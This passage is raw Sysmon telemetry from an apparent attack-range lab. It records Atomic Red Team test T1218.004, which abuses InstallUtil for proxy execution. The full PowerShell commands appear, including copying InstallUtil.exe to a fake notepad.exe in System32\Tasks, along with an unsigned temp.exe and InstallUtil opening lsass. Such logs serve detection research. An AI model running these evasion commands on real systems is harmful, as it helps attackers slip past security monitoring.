utomation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f38280d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3818df1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3855494 154100x800000000000000057458309Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.415{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /? C:\Users\ADMINI~1\AppData\Local\Temp\2\T1218.004.dll C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-78BC-618E-33F7-04000000F101}3172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:TEMP\\"" $InstallerAssemblyFileName = \""T1218.004.dll\"" $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""/? `\""$InstallerAssemblyFullPath`\""\"" $ExpectedOutput = 'Constructor_HelpText_' $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs if ($ActualOutput -ne $ExpectedOutput) { throw @\"" InstallUtil HelpText property execution test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} 154100x800000000000000057458385Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:54.792{8B6011A9-78BE-618E-39F7-04000000F101}7024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:windir\System32\Tasks\"" $InstallerAssemblyFileName = 'readme.txt' $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""readme.txt\"" $ExpectedOutput = 'Constructor_' # Explicitly set the directory so that a relative path to readme.txt can be supplied. Set-Location \""$Env:windir\System32\Tasks\"" Copy-Item -Path \""$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe\"" -Destination \""$Env:windir\System32\Tasks\notepad.exe\"" $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine InstallUtilPath = \""$Env:windir\System32\Tasks\notepad.exe\"" } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly if ($ActualOutput -ne $ExpectedOutput) { throw @\"" Evasive Installutil invocation test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 734700x800000000000000057458984Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:55.677{8B6011A9-78BF-618E-3EF7-04000000F101}6420C:\Windows\System32\Tasks\notepad.exeC:\Windows\System32\Tasks\notepad.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 154100x800000000000000057458978Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:55.678{8B6011A9-78BF-618E-3EF7-04000000F101}6420C:\Windows\System32\Tasks\notepad.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\System32\Tasks\notepad.exe" readme.txt C:\Windows\System32\Tasks\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-78BE-618E-39F7-04000000F101}7024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:windir\System32\Tasks\"" $InstallerAssemblyFileName = 'readme.txt' $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""readme.txt\"" $ExpectedOutput = 'Constructor_' # Explicitly set the directory so that a relative path to readme.txt can be supplied. Set-Location \""$Env:windir\System32\Tasks\"" Copy-Item -Path \""$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe\"" -Destination \""$Env:windir\System32\Tasks\notepad.exe\"" $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine InstallUtilPath = \""$Env:windir\System32\Tasks\notepad.exe\"" } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly if ($ActualOutput -ne $ExpectedOutput) { throw @\"" Evasive Installutil invocation test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} 154100x800000000000000057458901Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:55.514{8B6011A9-78BF-618E-3CF7-04000000F101}4564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\rxdxfoie\rxdxfoie.cmdline"C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57{8B6011A9-78BE-618E-39F7-04000000F101}7024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:windir\System32\Tasks\"" $InstallerAssemblyFileName = 'readme.txt' $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""readme.txt\"" $ExpectedOutput = 'Constructor_' # Explicitly set the directory so that a relative path to readme.txt can be supplied. Set-Location \""$Env:windir\System32\Tasks\"" Copy-Item -Path \""$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe\"" -Destination \""$Env:windir\System32\Tasks\notepad.exe\"" $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine InstallUtilPath = \""$Env:windir\System32\Tasks\notepad.exe\"" } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly if ($ActualOutput -ne $ExpectedOutput) { throw @\"" Evasive Installutil invocation test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} 154100x800000000000000057458821Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:55.390{8B6011A9-78BF-618E-3AF7-04000000F101}7940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\0pjluued\0pjluued.cmdline"C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57{8B6011A9-78BE-618E-39F7-04000000F101}7024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:windir\System32\Tasks\"" $InstallerAssemblyFileName = 'readme.txt' $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""readme.txt\"" $ExpectedOutput = 'Constructor_' # Explicitly set the directory so that a relative path to readme.txt can be supplied. Set-Location \""$Env:windir\System32\Tasks\"" Copy-Item -Path \""$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe\"" -Destination \""$Env:windir\System32\Tasks\notepad.exe\"" $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine InstallUtilPath = \""$Env:windir\System32\Tasks\notepad.exe\"" } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly if ($ActualOutput -ne $ExpectedOutput) { throw @\"" Evasive Installutil invocation test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} 734700x800000000000000057557563Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.767{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValid 734700x800000000000000057557552Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.767{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValid 734700x800000000000000057557538Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.752{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=4937BBA430F4AEEC4D0DC03A200348C3,SHA256=CDA95E98B9D37602AD11B97FDBF7BDDD2F79170CA5E140EB9D2A1B04E94E037FtrueMicrosoft WindowsValid 734700x800000000000000057557508Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.705{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=294BC43051C27ADB96A957A6FB9448BE,SHA256=9564D3F69345F9883161007F2E26298FD377B023D1D46C0AAE9821B4B26A74B3trueMicrosoft WindowsValid 734700x800000000000000057557484Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.673{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValid 734700x800000000000000057557456Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.673{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=DDB56B83B18735F13FD1CBEF877E9DB0,SHA256=C5EF7185888F971CFA486B64D71514512C1CCBAB8C5A1D8610CAE54476407126trueMicrosoft WindowsValid 734700x800000000000000057557432Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.673{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=A612555310B7F2A688FA57C7C10615BC,SHA256=028B8BA6A6CF74776C8E4F7485BB7973DE25242F292F837D78AB9CFCC3E8AC90trueMicrosoft WindowsValid 734700x800000000000000057557407Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.673{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=57F1700836CDEBA98A7CF770A15A9CF6,SHA256=781F8901F292ED968270E4605154B3B794BB3770EA7C751D94B6F3B21A5EB1C4trueMicrosoft WindowsValid 734700x800000000000000057557394Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.658{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Users\Administrator\Desktop\temp.exe0.0.0.0 --temp.exeMD5=E833A8C0BE0FF95FAAEAF31DE7D35F96,SHA256=7CF70B2CA5947991E52F64D45D9FB08A9455A276A1B3E1293A58153553AE54A6false-Unavailable 734700x800000000000000057557393Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.658{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Users\Administrator\Desktop\temp.exe0.0.0.0 --temp.exeMD5=E833A8C0BE0FF95FAAEAF31DE7D35F96,SHA256=7CF70B2CA5947991E52F64D45D9FB08A9455A276A1B3E1293A58153553AE54A6false-Unavailable 734700x800000000000000057557390Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.642{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\601bda4ba29a8d6b7b125b94c2697c8b\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=7372BB83C92065CC175F5B104E9A505D,SHA256=56381C9335A77E1478F8F27DBB70D877FD443C41210E6F6D6E34FFDB3E5DE463false-Unavailable 734700x800000000000000057557387Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.642{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System\2c8d66b5ef1d563cf9010bf4428ff9d2\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=88C6A31917BA9F2506E523DA037CC8DF,SHA256=15CD43739560489AEC0A752ACF5403A467319AC8E978DE279C702C74E792C5F2false-Unavailable 13241300x800000000000000057557384Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:44:56.705{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057557383Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:44:56.705{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057557382Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:44:56.705{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057557381Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:44:56.705{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057557380Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.705{8B6011A9-886B-6164-0B00-00000000F101}6489568C:\Windows\system32\lsass.exe{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057557379Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.705{8B6011A9-886B-6164-0B00-00000000F101}6489568C:\Windows\system32\lsass.exe{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x800000000000000057557378Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:56.705{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057557373Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.517{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValid 734700x800000000000000057557337Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.517{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValid 734700x800000000000000057557314Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.517{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=057E8B1C10BCFC56E238FFC109C7A01E,SHA256=E164F2C2B70575ECF5C8B266E84A6C3236C18A6F09AE09A99F59AC6B0AEAF8E8trueMicrosoft CorporationValid 734700x800000000000000057557288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.517{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=2BDBEE1B42063F245AC86F54C236BC4E,SHA256=CD558E008DA76E171FC9B8CF87556353330D7B7BF593B5074E4FEB08BC14CFC6trueMicrosoft WindowsValid 734700x800000000000000057557263Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.502{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7ded6822b7c67ccde0dc9249bee0271b\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=7BF3C3EF641852F9D4CCF7E80B1AFF13,SHA256=C7054ABC20409CCC86D1EF10E8B11369937FB5E81DFD9F15B31639071036CA9FtrueMicrosoft CorporationValid 734700x800000000000000057557239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValid 734700x800000000000000057557220Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValid 734700x800000000000000057557184Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F7E6254059E93E3FBD7FE0E3C5615605,SHA256=1AD1D4229C9FF3B4D041E4B4973A83BE2078EECD11E9EC00E4C0B42EAB20E07AtrueMicrosoft WindowsValid 734700x800000000000000057557162Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValid 734700x800000000000000057557141Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 